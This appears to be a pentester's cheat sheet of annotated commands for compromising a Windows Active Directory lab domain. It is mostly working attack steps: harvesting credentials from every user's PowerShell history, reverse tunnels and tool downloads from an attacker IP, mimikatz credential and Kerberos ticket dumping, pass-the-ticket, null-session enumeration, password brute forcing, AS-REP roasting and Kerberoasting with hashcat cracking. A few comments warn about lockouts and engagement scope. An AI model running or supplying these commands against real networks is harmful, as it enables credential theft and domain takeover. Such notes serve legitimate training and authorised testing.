Checklist
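# PSReadLine persists every interactive PowerShell line to disk, and admins routinely type
# credentials into it (net use, runas, Invoke-Command -Credential ...). Read the history file
# of EVERY profile, not only Administrator; listing the directory alone shows nothing useful.
# (Reading other users' profiles needs local admin; -ErrorAction hides the ones you cannot open.)
Get-ChildItem -Path 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue |
    ForEach-Object { "`n=== $($_.FullName) ==="; Get-Content -Path $_.FullName }
# The current session may save its history somewhere else if the profile changed it
(Get-PSReadLineOption).HistorySavePath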
Repeat this for every profile under C:\Users\ (not only Administrator); the file to read is ConsoleHost_history.txt, which frequently contains typed credentials.
Also run winPEAS afterwards so that sensitive files and stored credentials missed by the manual checks are picked up.
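# --- Pivoting (attacker side: chisel server -p 8888 --reverse) ---
# Reverse SOCKS: attacker's 127.0.0.1:9999 becomes a SOCKS proxy into the target network (use with proxychains)
.\chisel.exe client 192.168.45.x:8888 R:9999:socks
# NOTE: without the "R:" prefix this is a LOCAL forward (target:8080 -> attacker-side 127.0.0.1:80).
# To reach a service bound to the target's loopback from the attacker, reverse it instead: R:8080:127.0.0.1:80
.\chisel.exe client 192.168.45.x:8888 8080:127.0.0.1:80

# --- Tool transfer ---
# Use curl.exe explicitly: under PowerShell, bare "curl" is an alias for Invoke-WebRequest, where "-o" is
# an ambiguous parameter (OutFile/OutVariable/OutBuffer) and the command fails. curl.exe works in cmd and PowerShell.
curl.exe 192.168.45.x/SharpHound.exe -o SharpHound.exe
# Writes a timestamped .zip into the current directory; import that into BloodHound
.\SharpHound.exe -c all
curl.exe 192.168.45.x/mimikatz.exe -o mimikatz.exe

# --- Credential dumping (privilege::debug needs local admin; token::elevate impersonates SYSTEM) ---
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"
# Exports all cached Kerberos tickets as .kirbi files into the current directory
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::tickets /export" "exit"
dir *.kirbi
# Pass-the-ticket: kerberos::ptt is a mimikatz command, so run it through mimikatz like the lines above.
# Afterwards the ticket is in the current logon session (verify with "klist").
.\mimikatz.exe "kerberos::ptt <ticket>.kirbi" "exit"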
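# --- Unauthenticated / null-session AD enumeration ---
# enum4linux: -u and -p each take a VALUE, so "-u -p -a -A" misparses (user becomes "-p").
# -a already means "all simple enumeration"; pass real creds once you have them.
# (enum4linux-ng is the tool that uses -A for "all".)
enum4linux -a <IP>
enum4linux -u '<user>' -p '<pass>' -a <IP>
nmap -p 389 --script="ldap* and not brute" -Pn <IP>
# Anonymous LDAP bind: -x forces a simple bind; without it ldapsearch attempts SASL and the empty -D/-w are not used
ldapsearch -x -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com"
# The "description" attribute is a classic place where admins leave passwords
ldapsearch -x -H ldap://dc.offsec.com -D '' -w '' -b "dc=offsec,dc=com" | grep -i description
netexec smb <IP> -u '' -p '' --shares
netexec smb <IP> -u '' -p '' --users
# Tool is "netexec" (the old note had a typo). PASSWD_NOTREQD accounts and adminCount=1 objects are prime targets
netexec ldap <IP> -u '' -p '' --password-not-required --admin-count --users --groups
# RID cycling finds users even when --users is denied to the null session
netexec smb <IP> -u '' -p '' --rid-brute
netexec smb <IP> -u '' -p '' -M spider_plus
# These modules only CHECK for the issue. Do not run the real exploits (nopac/zerologon in particular
# can break the DC) without the engagement explicitly allowing it.
netexec smb <IP> -u '' -p '' -M printnightmare
netexec smb <IP> -u '' -p '' -M gpp_password
netexec smb <IP> -u '' -p '' -M spooler
netexec smb <IP> -u '' -p '' -M nopac
netexec smb <IP> -u '' -p '' -M zerologon
smbmap -H <IP>
smbclient -L \\\\<IP>\\ -U '' -N
# rpcclient: the four query* lines below are typed at the rpcclient> prompt, not in the shell
rpcclient -U '' -N <IP>
rpcclient -U "username%passwd" <IP>
querydispinfo
queryuser joe
querygroup 0x44f
querygroupmem 0x44f
# Kerberos user enumeration: does not lock accounts (pre-auth errors), but every probe is logged on the DC.
# Domain and DC must belong together - the old note mixed "pffsec.lab" with a dc in "oscp.exam".
kerbrute userenum -d <DOMAIN> /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc <DC>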
Try the usual credential guesses (user:user, username as password, season+year), AS-REP roasting, and brute forcing — but check the domain lockout policy first so you do not lock accounts out.
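# --- Password attacks, roasting, post-auth ---
# Single-user brute force: each failure counts toward lockoutThreshold. Read the policy first
# (netexec smb <IP> -u '' -p '' --pass-pol) and stay below it - full rockyou against one account WILL lock it.
kerbrute bruteuser -d offsec.lab ~/rockyou.txt w.smith
# AS-REP roasting without creds: needs a user list; accounts without Kerberos pre-auth return a crackable hash.
# (The old note was missing the space before -format and had no way to supply users.)
impacket-GetNPUsers oscp.exam/ -dc-ip <IP> -usersfile users.txt -no-pass -format hashcat
# AS-REP roasting with creds (prompts for the password): -request is required to pull the hashes, not just list accounts
impacket-GetNPUsers oscp.exam/user -dc-ip <IP> -request -format hashcat
# -m 18200 = AS-REP; -O optimized kernels (caps candidate length, fine for wordlists). Single -O is enough.
hashcat -m 18200 crackme.txt ~/rockyou.txt -r ~/opt/wordlists/best64.rule -O
# Kerberoasting: TGS hashes for accounts with an SPN (service accounts, often old/weak passwords)
impacket-GetUserSPNs oscp.exam/user:pass -dc-ip 192.168.1.129 -request
# -m 13100 = Kerberos 5 TGS-REP etype 23
hashcat -m 13100 crackme.txt ~/rockyou.txt -r ~/opt/wordlists/best64.rule -O
# MSSQL: first form sends the creds as a SQL login; add -windows-auth when the account is a domain/Windows account
impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40
impacket-mssqlclient aerospace.com/discovery:'Start123!'@192.168.193.40 -windows-auth
# Remote BloodHound collection from Linux; -ns is the DNS server (normally the DC). Import the JSON output into BloodHound
bloodhound-python -d offsec.lab -u greg -p pass -ns 192.168.1.129 -c all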